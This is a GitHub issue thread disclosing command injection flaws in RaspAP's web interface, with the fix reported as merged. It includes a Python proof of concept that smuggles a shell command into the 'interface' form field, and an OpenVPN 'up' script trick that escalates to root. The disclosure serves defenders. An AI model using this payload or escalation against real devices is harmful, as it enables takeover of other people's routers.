### ISSUE TITLE
[Security] OS Command injection vulnerabilities in configure_client.php and hostapd.php

### ISSUE THREAD

**Issue by eldstal** [RaspAP/raspap-webgui#1325]
## Security advisory
Multiple command injection vulnerabilities are present in the RaspAP web interface. They allow an authenticated user to execute arbitrary OS commands with the privileges of the web server.

### Affected products

RaspAP v2.8.8 and older

### Steps to reproduce

1. Obtain credentials for RaspAP
2. Configure and execute the following script

```python
#!/usr/bin/env python3

import re
import requests

TARGET="10.3.141.1"
CREDS="admin:secret"
URL=f"http://{CREDS}@{TARGET}/hostapd_conf"

sess = requests.Session()

# Get a valid CSRF token
doc = sess.get(URL).text.replace("\n", "")
csrf = re.match('.*name="csrf_token" value="([^"]+)".*', doc).group(1)

print(csrf)

res = sess.post(URL,
                data={
                   "csrf_token": csrf,
                   "txpower": "auto",

                   # Command payload is here:
                   "interface": ";uptime > /tmp/hax; echo",
                 }
                )

if res.status_code != 200:
  print("Failed to execute command")
```

3. Observe that the file `/tmp/hax` has been created on the raspi, and contains the output of `uptime`.

### Cause
There are two almost identical instances of the vulnerability, at [hostapd.php:103](https://github.com/RaspAP/raspap-webgui/blob/dda1fe6bbb92cffae7a53b516108650bfbb76cb2/includes/hostapd.php#L103) and [hostapd.php:108](https://github.com/RaspAP/raspap-webgui/blob/dda1fe6bbb92cffae7a53b516108650bfbb76cb2/includes/hostapd.php#L108). In both instances, an unsanitized POST variable is fed into a command executed using `exec()`.

A third instance exists at [configure_client.php:20](https://github.com/RaspAP/raspap-webgui/blob/592bce02bfee1169ca92e5e93ebded66bac42c6e/includes/configure_client.php#L20), exploitable in a similar manner.

### Impact

An authenticated user is able to execute arbitrary commands as `www-data`.

In the default RaspAP configuration, this can be leveraged to gain root access by exploiting two of the configured `sudo` permissions; overwrite the openvpn client configuration to set the following:

```
script-security 2
up /tmp/payload.sh
```

and establish an OpenVPN connection. `/tmp/payload.sh` will be executed with root privileges.

### Proposed Mitigation
Apply sanitization to the `txpower` and `interface` parameters, and use the PHP built-in `escapeshellarg()` before passing them to `exec()`.

**Comment by eldstal** [comment]
Since the old report wasn't intended to be removed, I've updated this issue to serve as a report for all three similar vulnerabilities.

Note: The two mentioned vulnerabilities in hostapd.php have already been fixed in [PR 1322](https://github.com/RaspAP/raspap-webgui/pull/1322).

**Comment by billz** [comment]
Resolved with #1326, @eldstal thanks for reporting and the PR
